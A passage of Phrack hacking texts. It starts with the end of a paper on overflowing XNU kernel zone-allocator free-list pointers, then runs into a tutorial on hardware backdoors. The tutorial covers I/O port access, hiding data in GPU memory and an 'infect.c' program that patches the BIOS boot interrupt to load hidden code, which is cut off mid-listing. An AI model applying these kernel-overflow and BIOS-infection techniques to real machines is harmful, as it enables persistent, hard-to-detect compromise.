or equal to the vm_last_addr. This is defined as 
VM_MAX_KERNEL_ADDRESS (shown below).

vm_last_addr = VM_MAX_KERNEL_ADDRESS;   /* Set the highest address
#define VM_MAX_KERNEL_ADDRESS        ((vm_offset_t) 0xFE7FFFFF)
#define VM_MAX_KERNEL_ADDRESS ((vm_offset_t) 0xDFFFFFFF)

Basically this means that anywhere within almost the entire
address space of the kernel is valid.  

Once these checks are performed, the final step zfree() does 
is to use the ADD_TO_ZONE() macro in order to add the free'ed 
element back to the free_elements list in the zone struct.

Here is the macro used to do this:

#define ADD_TO_ZONE(zone, element)                                      \
MACRO_BEGIN                                                             \
                if (zfree_clear)                                        \
                {   unsigned int i;                                     \
                    for (i=1;                                           \
                         i < zone->elem_size/sizeof(vm_offset_t) - 1;   \
                         i++)                                           \
                    ((vm_offset_t *)(element))[i] = 0xdeadbeef;         \
                }                                                       \
                ((vm_offset_t *)(element))[0] = (zone)->free_elements;  \
                (zone)->free_elements = (vm_offset_t) (element);        \
                (zone)->count--;                                        \

This macro runs through the memory allocated for the 
element which is being free()'ed in 4 byte intervals.
It writes out 0xdeadbeef to each location, filling
the memory. and clearing any original data. It then
writes into the first 4 bytes of the allocation, the
old free_elements pointer, from the zone struct. 

Now that I have shown briefly how the zone allocator 
functions I will look at what happens in the case of an

In the diagram below you can see an element in use
followed by a free element. The first element 
contains the data used by the struct (in this 
sample case the struct is made up.)

The second element consists of the pointer to the 
free element followed by the unsigned long 
0xdeadbeef repeated to fill the struct. Both the
in use and free elements are the same size.

low memory  (0x00000000)
----( Element being overflowed )-----
  00 00 00 01
  22 22 22 22
  33 33 33 33
  00 00 00 00 
  00 00 00 00 
  00 00 00 00 
  00 00 00 00 
-----------( Free Element )----------
[ ff fc 7c 7d ]	<== Pointer to next free element.
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
high memory (0xffffffff)

In the case where a buffer within the first
in use struct is overflown, (in this case with
capital A [0x41])  it is then possible to overwrite
the free elements "next" pointer. This is 
demonstrated below.
low memory  (0x00000000)
----( Element being overflowed )-----
  00 00 00 01
  22 22 22 22
  33 33 33 33
  41 41 41 41 <== Overflow starts here
  41 41 41 41 
  41 41 41 41 
  41 41 41 41 
-----------( Free Element )----------
[ 41 41 41 41 ]	<== Overflow into pointer.
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
  ef be ad de
high memory (0xffffffff)

In this case, when the REMOVE_FROM_ZONE() macro
is used by zalloc() the user controlled address
0x41414141 will become the zone struct's new 
free_elements pointer, and consequently, be
used by the next allocation of the element type.

If this address is positioned correctly it may be
possible to have something user controlled overwrite
a useful pointer in kernel space and in this way gain
control of execution. 

Due to the checks performed on zfree() it is 
recommended that efforts should be taken to avoid 
this element being passed to zfree() however.
As this will result in a kernel panic().

--[ 11 - Conclusion
Hopefully if you bothered to read this far you learned 
something useful. If not, I apologize.

If you take any of these ideas and work on them further
or know of a better method to do anything covered in this
paper I'd appreciate an email letting me know at: Flames to 
please ;)

Now for the thanks. A huge thankyou to my amazing fiancee pif 
for her love and support while i was writing this.
Thanks to bk for all the help and long conversations about XNU. 
Thanks to everyone at felinemenace for all the support, code 
and fun times. Also a big thank you to my computer for not 
kernel panic()'ing for a third time during the process of 
saving this paper. I think if you had written random bytes 
over the paper a third time I wouldn't have had the stamina 
to rewrite (again).

Finally, this paper isn't complete without another bad Star 
Wars pun to match the title so here we go....

May the fork()'s be with root...

--[ 12 - References

[1] b-r00t's Smashing the Mac for Fun & Profit  
[2] Smashing The Kernel Stack For Fun And Profit 
[3] Linux on-the-fly kernel patching without LKM
[4] Mach-O Runtime ...
[5] Understanding windows shellcode
[6] Smashing The Kernel Stack For Fun And Profit
[7] Ilja's blackhat talk - ...
[8] Mac OS X PPC Shellcode Tricks -
[9] Smashing the Stack for Fun and Profit -
[10] Radical Environmentalists by Netric -
[11] Non eXecutable Stack Lovin on OSX86 -
[12] Mach-O Infection -
[13] Infecting Mach-O Fies
[14] class-dump
[15] HTE -
[16] Architecture Spanning Shellcode -
[17] Multicast DNS -
[18] mDNS RFC	-
[19] mDNS API -
[20] mdns command line utility -
[21] KUNC Reference -

--[ 13 - Appendix - Code

Extract this code with uudecode. 

begin 644 code.tgz


              _                                                _
            _/B\_                                            _/W\_
            (* *)            Phrack #64 file 12              (* *)
            | - |                                            | - |
            |   |       Hacking deeper in the system         |   |
            |   |                                            |   |
            |   |               by scythale                  |   |
            |   |                                            |   |
            |   |                |   |


	1.  Abstract
	2.  A quick introduction to I/O system
	3.  Playing with GPU
	4.  Playing with BIOS
	5.  Conclusion
	6.  References
	7.  Thanks

1.  Abstract

     Today, we're observing a growing number of papers focusing on hardware
hacking. Even if hardware-based backdoors are far from being a good
solution to use in the wild, this topic is very important as some big
corporations are planning to take control of our computers without our
consent using some really bad designed concepts such as DRM and TCPA.
As we can't let them do this at any cost, the time has come for a little
introduction to the hardware world...

     This paper constitutes a tiny introduction to hardware hacking in the
backdoor writers perspective (hey, this is phrack, I'm not going to explain
how to pilot your coffee machine with a RS232 interface). The thing is
even if backdooring hardware isn't a so good idea, it is a good way to
start in hardware hacking. The aim of the author is to give readers the
basis of hardware hacking which should be usefull to prepare for the fight
against TCPA and other crappy things sponsored by big sucke... erm...
"companies" such as Sony and Microsoft.

     This paper is i386 centric. It does not cover any other architecture,
but it can be used as a basis on researches about other hardware. Thus
bear in mind that most of the material presented here won't work on any
other machine than a PC. Subjects such as devices, BIOS and internal work
of a PC will be discussed and some ideas about turning all these things to
our own advantage will be presented.

     This paper IS NOT an ad nor a presentation of some 3v1L s0fTw4r3,     
so you won't find a fully functionnal backdoor here. The aim of the author
is to provide information that would help you in writing your own stuff,
not to provide you with an already done work. This subject isn't a
particularly difficult one, all it just takes is immagination.

     In order to understand this article, some knowledge about x86 assembly
and architecture is heavily recommended. If you're a newbie to these
subjects, I strongly recommend you to read "The Art of Assembly
Programming" (see [1]).

2.  A quick introduction to I/O system

     Before digging straight into the subject, some explanations must be
done. Those of you who already know how I/O works on Intel's and what
they're here for might just prefer to skip to the next section. Others,
just keep on reading. 

     As this paper focuses on hardware, it would be practical to know how
to access it. The I/O system provides such an access. As everybody knows,
the processor (CPU) is the heart, or, more accurately, the brain of the
computer. But the only thing it does is to compute. Basically, a CPU isn't
of much help without devices. Devices give data to be computed to the CPU,
and allow it to bring back an answer to our requests. The I/O system is
used to link most of devices to the CPU. The way processors see I/O based
devices is quite the same as the way they see memory. In fact, all the
processors do to communicate with devices is to read and write data
"somewhere in memory" : the I/O system is charged to handle the next steps.
This "somewhere in memory" is represented by an I/O port. I/O ports are
special "addresses" that connects the CPU data bus to the device. Each I/O
based device uses at least one I/O port, many of them using several. 
Basically, the only thing device drivers do is to manipulate I/O ports
(well, very basically, that's what they do, just to communicate with
hardware). The Intel Architecture provides three main ways to manipulate
I/O ports : memory-mapped I/O, Input/Output mapped I/O and DMA.

      memory-mapped I/O

   The memory-mapped I/O system allows to manipulate I/O ports as if they
were basic memory. Instructions such as 'mov' are used to interface with
it. This system is simple : all it does is to map I/O ports to memory
addresses so that when data is written/read at one of these addresses, the
data is actually sent to/received by the device connected to the
corresponding port. Thus, the way to communicate with a device is the same
as communicating with memory.

      Input/Output mapped I/O

   The Input/Output mapped I/O system uses dedicated CPU instructions to
access I/O ports. On i386, these instructions are 'in' and 'out' :

       in 254, reg   ; writes content of reg register to port #254

       out reg, 254  ; reads data from port #254 and stores it in reg

    The only problem with these two instructions is that the port is
8 bit-encoded, allowing only an access to ports 0 to 255. The sad thing is
that this range of ports is often connected to internal hardware such as
the system clock. The way to circomvent it is the following (taken from
"The Art of Assembly Programming, see [1]) :

To access I/O ports at addresses beyond 255 you must load the 16-bit I/O
address into the DX register and use DX as a pointer to the specified I/O
address. For example, to write a byte to the I/O address $378 you would use
an instruction sequence like the following:

   mov $378, dx
   out al, dx


     DMA stands for Direct Memory Access. The DMA system is used to enhance
devices to memory performances. Back in the old days, most hardware made
use of the CPU to transfer data to and from memory. When computers started 
to become "multimedia" (a term as meaningless as "people ready" but really 
good looking in "we-are-trying-to-fuck-you-deep-in-the-ass ads"), that is
when computers started to come equiped with CD-ROM and sound cards, CPU
couldn't handle tasks such as playing music while displaying a shotgun
firing at a monster because the user just has hit the 'CTRL' key. So,
constructors created a new chip to be able to carry out such things, and so
was born the DMA controller. DMA allows devices to transfer data from and
to memory with little operations done by the CPU. Basically, all the CPU
does is to initiate the DMA transfer and then the DMA chip takes care of
the rest, allowing the CPU to focus on other tasks. The very interesting
thing is that since the CPU doesn't actually do the transfer and since
devices are being used, protected mode does not interfere, which means we
can write and read (almost) anywhere we would like to. This idea is far
from being new, and PHC already evoqued it in one of their phrack parody.

      DMA is really a powerfull system. It allows us to do very cool
tricks but this come as the expense of a great prize : DMA is a pain in
the ass to use as it is very hardware specific. Here follows the main
different kinds of DMA systems :

	- DMA Controller (third-party DMA) : this DMA system is really old
and inefficient. The idea here is to have a general DMA Controller on the
motherboard that will handle every DMA operations for every devices. This
controller was mainly used with ISA devices and its use is now deprecated
because of performance issues and because only 4 to 8 (depending if the
board had two cascading DMA Controllers) DMA transfers could be setup at
the same time (the DMA Controller only provides 4 channels).

	- DMA Bus mastering (first-party DMA) : this DMA system provides
far better performances than the DMA Controller. The idea is to allow
each device to manage DMA himself by a processus known as "Bus Mastering".
Instead of relying on the general DMA Controller, each device is able to
take control of the system bus to perform its transfers, allowing hardware
manufacturers to provide an efficient system for their devices.

    These three things are practical enough to get started but modern
operating systems provides medias to access I/O too. As there are a lot of
these systems on the computer market, I'll introduce only the GNU/Linux
system, which constitutes a perfect system to discover hardware hacking on
Intel. As many systems, Linux is run in two modes : user land and kernel
land. Since Kernel land already allows a good control on the system, let's
see the user land ways to access I/O. I'll explain here two basic ways to
play with hardware : in*(), out*() and /dev/port :


    The in and out instructions can be used on Linux in user land. Equally,
the functions outb(2), outw(2), outl(2), inb(2), inw(2), inl(2) are
provided to play with I/O and can be called from kernel land or user land.
As stated in "Linux Device Drivers" (see [2]), their use is the following :

    unsigned	inb(unsigned port);
    void	outb(unsigned char byte, unsigned port);

Read or write byte ports (eight bits wide). The port argument is defined as
unsigned long for some platforms and unsigned short for others. The return
type of inb is also different across architectures.

   unsigned	inw(unsigned port);
   void		outw(unsigned short word, unsigned port);

These functions access 16-bit ports (word wide); they are not available
when compiling for the M68k and S390 platforms, which support only byte

   unsigned	inl(unsigned port);
   void		outl(unsigned longword, unsigned port);

These functions access 32-bit ports. longword is either declared as
unsigned long or unsigned int, according to the platform. Like word I/O,
"long" I/O is not available on M68k and S390.

    Note that no 64-bit port I/O operations are defined. Even on 64-bit
architectures, the port address space uses a 32-bit (maximum) data path.

    The only restriction to access I/O ports this way from user land is
that you must use iopl(2) or ioperm(2) functions, which sometimes are
protected by security systems like grsec. And of course, you must be root.
Here is a sample code using this way to access I/O :


** Just a simple code to see how to play with inb()/outb() functions.
** usage is :
**	* read : io r <port address>
**	* write : io w <port address> <value>
** compile with : gcc io.c -o io

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/io.h>	/* iopl(2) inb(2) outb(2) */

void		read_io(long port)
  unsigned int	val;

  val = inb(port);
  fprintf(stdout, "value : %X\n", val);

void		write_io(long port, long value)
  outb(value, port);

int	main(int argc, char **argv)
  long	port;

  if (argc < 3)
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
  port = atoi(argv[2]);
  if (iopl(3) == -1)
      fprintf(stderr, "could not get permissions to I/O system\n");
  if (!strcmp(argv[1], "r"))
  else if (!strcmp(argv[1], "w"))
    write_io(port, atoi(argv[3]));
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
  return 0;



    /dev/port is a special file that allows you to access I/O as if you
were manipulating a simple file. The use of the functions open(2), read(2),
write(2), lseek(2) and close(2) allows manipulation of /dev/port. Just go
to the address corresponding to the port with lseek() and read() or write()
to the hardware. Here is a sample code to do it :


** Just a simple code to see how to play with /dev/port
** usage is :
**	* read : port r <port address>
**	* write : port w <port address> <value>
** compile with : gcc port.c -o port

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

void		read_port(int fd, long port)
  unsigned int	val = 0;

  lseek(fd, port, SEEK_SET);
  read(fd, &val, sizeof(char));
  fprintf(stdout, "value : %X\n", val);

void		write_port(int fd, long port, long value)
  lseek(fd, port, SEEK_SET);
  write(fd, &value, sizeof(char));

int	main(int argc, char **argv)
  int	fd;
  long	port;

  if (argc < 3)
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
  port = atoi(argv[2]);
  if ((fd = open("/dev/port", O_RDWR)) == -1)
      fprintf(stderr, "could not open /dev/port\n");
  if (!strcmp(argv[1], "r"))
    read_port(fd, port);
  else if (!strcmp(argv[1], "w"))
    write_port(fd, port, atoi(argv[3]));
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
  return 0;


    Ok, one last thing before closing this introduction : for Linux users
who want to list the I/O Ports on their system, just do a
"cat /proc/ioports", ie:

     $ cat /proc/ioports # lists ports from 0000 to FFFF
     0000-001f : dma1
     0020-0021 : pic1
     0040-0043 : timer0
     0050-0053 : timer1
     0060-006f : keyboard
     0080-008f : dma page reg
     00a0-00a1 : pic2
     00c0-00df : dma2
     00f0-00ff : fpu
     0170-0177 : ide1
     01f0-01f7 : ide0
     0213-0213 : ISAPnP
     02f8-02ff : serial
     0376-0376 : ide1
     0378-037a : parport0
     0388-0389 : OPL2/3 (left)
     038a-038b : OPL2/3 (right)
     03c0-03df : vga+
     03f6-03f6 : ide0
     03f8-03ff : serial
     0534-0537 : CS4231
     0a79-0a79 : isapnp write
     0cf8-0cff : PCI conf1
     b800-b8ff : 0000:00:0d.0
       b800-b8ff : 8139too
     d000-d0ff : 0000:00:09.0
       d000-d0ff : 8139too
     d400-d41f : 0000:00:04.2
       d400-d41f : uhci_hcd
     d800-d80f : 0000:00:04.1
       d800-d807 : ide0
       d808-d80f : ide1
     e400-e43f : 0000:00:04.3
       e400-e43f : motherboard
       e400-e403 : PM1a_EVT_BLK
       e404-e405 : PM1a_CNT_BLK
       e408-e40b : PM_TMR
       e40c-e40f : GPE0_BLK
       e410-e415 : ACPI CPU throttle
     e800-e81f : 0000:00:04.3
       e800-e80f : motherboard
         e800-e80f : pnp 00:02

3.  Playing with GPU

     3D cards are just GREAT, period. When you're installing such a card in
your computer, you're not just plugging a device that can render nice
graphics, you're also putting a mini-computer in your own computer. Today's
graphical cards aren't a simple chip anymore. They have memory, they have a
processor, they even have a BIOS ! You can enjoy a LOT of features from
these little things.

     First of all, let's consider what a 3D card really is. 3D cards are
here to enhance your computer performances rendering 3D and to send output
for your screen to display. As I said, there are three parts that interest
us in our 3v1L doings :

       1/ The Video RAM. It is memory embedded on the card. This memory is
used to store the scene to be rendered and to store computed results. Most
of today's cards come with more than 256 MB of memory, which provide us a
nice place to store our stuff.

       2/ The Graphical Processing Unit (shortly GPU). It constitutes the
processor of your 3D card. Most of 3D operations are maths, so most of the
GPU instructions compute maths designed to graphics.

       3/ The BIOS. A lot of devices include today their own BIOS. 3D cards
make no exception, and their little BIOS can be very interesting as they
contain the firmware of your 3D card, and when you access a firmware, well,
you can just nearly do anything you dream to do.

       I'll give ideas about what we can do with these three elements, but
first we need to know how to play with the card. Sadly, as to play with any
device in your computer, you need the specs of your material and most 3D
cards are not open enough to do whatever we want. But this is not a big
problem in itself as we can use a simple API which will talk with the card
for us. Of course, this prevents us to use tricks on the card in certain
conditions, like in a shellcode, but once you've gained root and can do
what pleases you to do on the system it isn't an issue anymore. The API I'm
talking about is OpenGL (see [3]), and if you're not already familiar with
it, I suggest you to read the tutorials on [4]. OpenGL is a 3D programming 
API defined by the OpenGL Architecture Review Board which is composed of
members from many of the industry's leading graphics vendors. This library
often comes with your drivers and by using it, you can develop easily
portable code that will use features of the present 3D card.

       As we now know how to communicate with the card, let's take a deeper
look at this hardware piece. GPU are used to transform a 3D environment
(the "scene") given by the programmer into a 2D image (your screen).
Basically, a GPU is a computing pipeline applying various mathematical
operations on data. I won't introduce here the complete process of
transforming a 3D scene into a 2D display as it is not the point of this
paper. In our case, all you have to know is :

   1/ The GPU is used to transform input (usually a 3D scene but nothing
prevents us from inputing anything else)

   2/ These transformations are done using mathematical operations commonly
used in graphical programming (and again nothing prevents us from using
those operations for another purpose)

   3/ The pipeline is composed of two main computations each involving
multiple steps of data transformation :

	 - Transformation and Lighting : this step translates 3D objects
	 into 2D nets of polygons (usually triangles), generating a
	 wireframe rendering.

	 - Rasterization : this step takes the wireframe rendering as input
	 data and computes pixels values to be displayed on the screen.

      So now, let's take a look at what we can do with all these features.
What interests us here is to hide data where it would be hard to find it
and to execute instructions outside the processor of the computer. I won't
talk about patching 3D cards firmware as it requires heavy reverse
engineering and as it is very specific for each card, which is not the
subject of this paper.

	First, let's consider instructions execution. Of course, as we are
playing with a 3D card, we can't do everything we can do with a computer
processor like triggering software interrupts, issuing I/O operations or
manipulating memory, but we can do lots of mathematical operations. For
example, we can encrypt and decrypt data with the 3D card's processor
which can render the reverse engineering task quite painful. Also, it can
speed up programs relying on heavy mathematical operations by letting the
computer processor do other things while the 3D card computes for him. Such
things have already been widely done. In fact, some people are already
having fun using GPU for various purposes (see [5]). The idea here is to
use the GPU to transform data we feed him with. GPUs provide a system to
program them called "shaders". You can think of shaders as a programmable
hook within the GPU which allows you to add your own routines in the data
transformation processus. These hooks can be triggered in two places of the
computing pipeline, depending on the shader you're using. Traditionnaly,
shaders are used by programmers to add special effects on the rendering
process and as the rendering process is composed of two steps, the GPU
provides two programmable shaders. The first shader is called the
"Vexter shader". This shader is used during the transformation and lighting
step. The second shader is called the "Pixel shader" and this one is used
during the rasterization processus.

	  Ok, so now we have two entry points in the GPU system, but this
doesn't tell us how to develop and inject our own routines. Again, as we
are playing in the hardware world, there are several ways to do it,
depending on the hardware and the system you're running on. Shaders use
their own programming languages, some are low level assembly-like
languages, some others are high level C-like languages. The three main
languages used today are high level ones :

      - High-Level Shader Language (HLSL) : this language is provided by
      Microsoft's DirectX API, so you need MS Windows to use it. (see [6])

      - OpenGL Shading Language (GLSL or GLSlang) : this language is
      provided by the OpenGL API. (see [7])

      - Cg : this language was introduced by NVIDIA to program on their
      hardware using either the DirectX API or the OpenGL one. Cg comes
      with a full toolkit distributed by NVIDIA for free (see [8] and [9]).

    Now that we know how to program GPUs, let's consider the most
interesting part : data hiding. As I said, 3D cards come with a nice
amount of memory. Of course, this memory is aimed at graphical usage but
nothing prevents us to store some stuff in it. In fact, with the help of
shaders we can even ask the 3D card to store and encrypt our data. This is
fairly easy to do : we put the data in the beginning of the pipeline, we
program the shaders to decide how to store and encrypt it and we're done.
Then, retrieving this data is nearly the same operation : we ask the
shaders to decrypt it and to send it back to us. Note that this encryption
is really weak, as we rely only on shaders' computing and as the encryption
and decryption process can be reversed by simply looking at the shaders
programming in your code, but this can constitutes an effective way to
improve already existing tricks (a 3D card based Shiva could be fun).

    Ok, so now we can start coding stuff taking advantage of our 3D cards.
But wait ! We don't want to mess with shaders, we don't want to learn
about 3D programming, we just want to execute code on the device so we can
quickly test what we can do with those devices. Learning shaders
programming is important because it allows to understand the device better
but it can be really long for people unfamiliar with the 3D world.
Recently, nVIDIA released a SDK allowing programmers to easily use 3D
devices for other purposes than graphisms. nVIDIA CUDA (see [10]) is a SDK
allowing programmers to use the C language with new keywords used to tell
the compiler which part of the code should be executed on the device and
which part of the code should be executed on the CPU. CUDA also comes with
various mathematical libraries.

     Here is a funny code to illustrate the use of CUDA :

------[ 3ddb.c

** 3ddb.c : a very simple program used to store an array in
** GPU memory and make the GPU "encrypt" it. Compile it using nvcc.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include <cutil.h>
#include <cuda.h>

/*** GPU code and data ***/

char *		store;

__global__ void	encrypt(int key)
  /* do any encryption you want here */
  /* and put the result into 'store' */
  /* (you need to modify CPU code if */
  /* the encrypted text size is      */
  /* different than the clear text   */
  /* one). */

/*** end of GPU code and data ***/

/*** CPU code and data ***/
CUdevice	dev;

void		usage(char * cmd)
  fprintf(stderr, "usage is : %s <string> <key>\n", cmd);

void		init_gpu()
  int		count;

  if (count <= 0)
      fprintf(stderr, "error : could not connect to any 3D card\n");
  CU_SAFE_CALL(cuDeviceGet(&dev, 0));

int		main(int argc, char ** argv)
  int		key;
  char *	res;

  if (argc != 3)
  CUDA_SAFE_CALL(cudaMalloc((void **)&store, strlen(argv[1])));
  res = malloc(strlen(argv[1]));
  key = atoi(argv[2]);
  encrypt<<<128, 256>>>(key);
  for (i = 0; i < strlen(argv[1]); i++)
    printf("%c", res[i]);
  CUT_EXIT(argc, argv);
  return 0;


4.  Playing with BIOS

     BIOSes are very interesting. In fact, little work has already been
done in this area and some stuff has already been published. But let's
recap all this things and take a look at what wonderful tricks we can do
with this little chip. First of all, BIOS means Basic Input/Output System.
This chip is in charge of handling boot process, low-level configuration
and of providing a set of functions for boot loaders and operating systems
during their early loading processus. In fact, at boot time, BIOS takes
control of the system first, then it does a couple of checks, then it sets
an IDT to provide features via interruptions and finally tries to load the
boot loader located in each bootable device, following its configuration.
For example, if you specify in your BIOS setup to first try to boot on
optical drive and then on your harddrive, at boot time the BIOS will first
try to run an OS from the CD, then from your harddrive. BIOSes' code is the
VERY FIRST code to be executed on your system. The interesting thing is
that backdooring it virtually gives us a deep control of the system and a
practical way to bypass nearly any security system running on the target,
since we execute code even before this system starts ! But the inconvenient
of this thing is big : as we are playing with hardware, portability becomes
a really big issue.

     The first thing you need to know about playing with BIOS is that there
are several ways to do it. Some really good publications (see [11]) have
been made on the subject, but I'll focus on what we can do when patching
the ROM containing the BIOS.

      BIOSes are stored in a chip located on your motherboard. Old BIOSes
were  single ROMs without write possibilities, but then some manufacturers
got the brilliant idea to allow BIOS patching. They introduced the BIOS
flasher, which is a little device we can communicate with using the I/O
system. The flasher can read and write the BIOS for us, which is all we
need to play in this land. Of course, as there are many different BIOSes
in the wild, I won't introduce any particular chip. Here are some pointers
that will help you :

      * [12] /dev/bios is a tool from the OpenBIOS initiative (see [13]).
It is a kernel module for Linux that creates devices to easily manipulate
various BIOSes. It can access several BIOSes, including network card
BIOSes. It is a nice tool to play with and the code is nice, so you'll see 
how to get your hands to work.

      * [14] is a WONDERFUL guide that will explain you nearly everything
about Award BIOSes. This paper is a must read for anyone interested in this
subject, even if you don't own an Award BIOS.

      * [15] is an interesting website to find information about various

      In order to start easy and fast, we'll use a virtual machine, which
is very handy to test your concepts before you waste your BIOS. I
recommend you to use Bochs (see [16]) as it is free and open source and
mainly because it comes with a very well commented source code used to
emulate a BIOS. But first, let's see how BIOSes really work.

       As I said, BIOS is the first entity which has the control over your
system at boottime. The interesting thing is, in order to start to reverse
engineer your BIOS, that you don't even need to use the flasher. At the
start of the boot process, BIOS's code is mapped (or "shadowed") in RAM at
a specific location and uses a specific range of memory. All we have to do
to read this code, which is 16 bits assembly, is to read memory. BIOS
memory area starts at 0xf0000 and ends at 0x100000. An easy way to dump
the code is to simply do a :

   % dd if=/dev/mem of=BIOS.dump bs=1 count=65536 seek=983040
   % objdump -b binary -m i8086 -D BIOS.dump

   You should note that as BIOS contains data, such a dump isn't accurate
as you will have a shift preventing code to be disassembled correctly. To
address this problem, you should use the entry points table provided
farther and use objdump with the '--start-address' option.

      Of course, the code you see in memory is rarely easy to retrieve in
the chip, but the fact you got the somewhat "unencrypted text" can help a
lot. To get started to see what is interesting in this code, let's have a
look at a very interesting comment in the Bochs BIOS source code
(from [17]) :

	 30 // ROM BIOS compatability entry points:
	 31 // ===================================
	 32 // $e05b ; POST Entry Point
	 33 // $e2c3 ; NMI Handler Entry Point
	 34 // $e3fe ; INT 13h Fixed Disk Services Entry Point
	 35 // $e401 ; Fixed Disk Parameter Table
	 36 // $e6f2 ; INT 19h Boot Load Service Entry Point
	 37 // $e6f5 ; Configuration Data Table
	 38 // $e729 ; Baud Rate Generator Table
	 39 // $e739 ; INT 14h Serial Communications Service Entry Point
	 40 // $e82e ; INT 16h Keyboard Service Entry Point
	 41 // $e987 ; INT 09h Keyboard Service Entry Point
	 42 // $ec59 ; INT 13h Diskette Service Entry Point
	 43 // $ef57 ; INT 0Eh Diskette Hardware ISR Entry Point
	 44 // $efc7 ; Diskette Controller Parameter Table
	 45 // $efd2 ; INT 17h Printer Service Entry Point
	 46 // $f045 ; INT 10 Functions 0-Fh Entry Point
	 47 // $f065 ; INT 10h Video Support Service Entry Point
	 48 // $f0a4 ; MDA/CGA Video Parameter Table (INT 1Dh)
	 49 // $f841 ; INT 12h Memory Size Service Entry Point
	 50 // $f84d ; INT 11h Equipment List Service Entry Point
	 51 // $f859 ; INT 15h System Services Entry Point
	 52 // $fa6e ; Character Font for 320x200 & 640x200 Graphics \
	 (lower 128 characters)
	 53 // $fe6e ; INT 1Ah Time-of-day Service Entry Point
	 54 // $fea5 ; INT 08h System Timer ISR Entry Point
	 55 // $fef3 ; Initial Interrupt Vector Offsets Loaded by POST
	 56 // $ff53 ; IRET Instruction for Dummy Interrupt Handler
	 57 // $ff54 ; INT 05h Print Screen Service Entry Point
	 58 // $fff0 ; Power-up Entry Point
	 59 // $fff5 ; ASCII Date ROM was built - 8 characters in MM/DD/YY
	 60 // $fffe ; System Model ID

	 These offsets indicate where to find specific BIOS
functionalities in memory and, as they are standard, you can apply them to
your BIOS too. For example, the BIOS interruption 19h is located in memory
at 0xfe6f2 and its job is to load the boot loader in RAM and to jump on it.
On old systems, a little trick was to jump to this memory location to
reboot the system. But before considering BIOS code modification, we have
one issue to resolve : BIOS chips have limited space, and if it can
provide enough space for basic backdoors, we'll end up quickly begging for
more places to store code if we want to do something nice. We have two ways
to get more space :

     1/ We patch the int19h code so that instead of loading the real
bootloader on a device specified, it loads our code (which will load the
real bootloader once it's done) at a specific location, like a sector
marked as defective on a specific hard drive. Of course, this operation
implies alteration of another media than BIOS, but, since it provides us
with as nearly as many space as we could dream, this method must be taken
into consideration

     2/ If you absolutely want to stay in BIOS space, you can do a little
trick on some BIOS models. One day, processors manufacturers made a deal
with BIOS manufacturers. Processor manufacturers decided to give the
possibility to update the CPU's microcode in order to fix bugs without
having to recall all sold material (remember the f00f bug ?). The idea was
that the BIOS would store the updated microcode and inject it in the CPU
during each boot process, as modifications on microcode aren't permanent.
This feature is known as "BIOS update". Of course, this microcode takes
space and we can search for the code injecting it, hook it so it doesn't do
anything anymore and erase the microcode to store our own code.

	  Implementing 2/ is more complex than 1/, so we'll focus on the
first one to get started. The idea is to make the BIOS load our own code
before the bootloader. This is very easy to do. Again, BochsBIOS sources
will come in handy, but if you look at your BIOS dump, you should see very
little differences. The code which interests us is located at 0xfe6f2 and
is the 19h BIOS interrupt. This one is very interesting as this is the one
in charge of loading the boot loader. Let's take a look at the interesting 
part of its code :

       7238   // We have to boot from harddisk or floppy
       7239   if (bootcd == 0) {
       7240     bootseg=0x07c0;
       7242 ASM_START
       7243     push bp	
       7244     mov  bp, sp
       7246     mov  ax, #0x0000
       7247     mov  _int19_function.status + 2[bp], ax	
       7248     mov  dl, _int19_function.bootdrv + 2[bp]
       7249     mov  ax, _int19_function.bootseg + 2[bp]
       7250     mov  es, ax         ;; segment		
       7251     mov  bx, #0x0000    ;; offset		
       7252     mov  ah, #0x02      ;; function 2, read diskette sector
       7253     mov  al, #0x01      ;; read 1 sector	
       7254     mov  ch, #0x00      ;; track 0		
       7255     mov  cl, #0x01      ;; sector 1		
       7256     mov  dh, #0x00      ;; head 0
       7257     int  #0x13          ;; read sector
       7258     jnc  int19_load_done
       7259     mov  ax, #0x0001
       7260     mov  _int19_function.status + 2[bp], ax
       7262 int19_load_done:
       7263     pop  bp
       7264 ASM_END

	int13h is the BIOS interruption used to access storage devices. In
our case, BIOS is trying to load the boot loader, which is on the first
sector of the drive. The interesting thing is that by only changing the
value put in one register, we can make the BIOS load our own code. For
instance, if we hide our code in the sector number 0xN and if we patch the
BIOS so that instead of the instruction 'mov cl, #0x01' we have
'mov cl, #0xN', we can have our code loaded at each boot and reboot.
Basically, we can store our code wherever we want to as we can change the
sector, the track and even the drive to be used. It is up to you to chose
where to store your code but as I said, a sector marked as defective can
work out as an interesting trick.

       Here are three source codes to help you get started faster : the
first one, inject.c, modifies the ROM of the BIOS so that it loads our code
before the boot loader. inject.c needs /dev/bios to run. The second one,
code.asm, is a skeletton to fill with your own code and is loaded by the
BIOS. The third one, store.c, inject code.asm in the target sector of the
first track of the hard drive.

--[ infect.c

#define _GNU_SOURCE

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define BUFSIZE		512
#define BIOS_DEV	"/dev/bios"

#define CODE		"\xbb\x00\x00"  /* mov bx, 0 */ \
			"\xb4\x02"      /* mov ah, 2 */ \
			"\xb0\x01"      /* mov al, 1 */ \
			"\xb5\x00"      /* mov ch, 0 */ \
			"\xb6\x00"      /* mov dh, 0 */ \
			"\xb1\x01"      /* mov cl, 1 */ \
			"\xcd\x13"      /* int 0x13 */

#define TO_PATCH	"\xcd\x13" 	 /* mov cl, 1 */


void	usage(char *cmd)
  fprintf(stderr, "usage is : %s [bios rom] <sector> <infected rom>\n", cmd);

** This function looks in the BIOS rom and search the int19h procedure.
** The algorithm used sucks, as it does only a naive search. Interested
** readers should change it.
char *	search(char * buf, size_t size)
  return memmem(buf, size, CODE, sizeof(CODE));

void	patch(char * tgt, size_t size, int sector)
  char		new;
  char *	tmp;

  tmp = memmem(tgt, size, TO_PATCH, sizeof(TO_PATCH));
  new = (char)sector;
  tmp[SECTOR_OFFSET] = new;

int		main(int argc, char **argv)
  int		sector;
  size_t	i;
  size_t	ret;
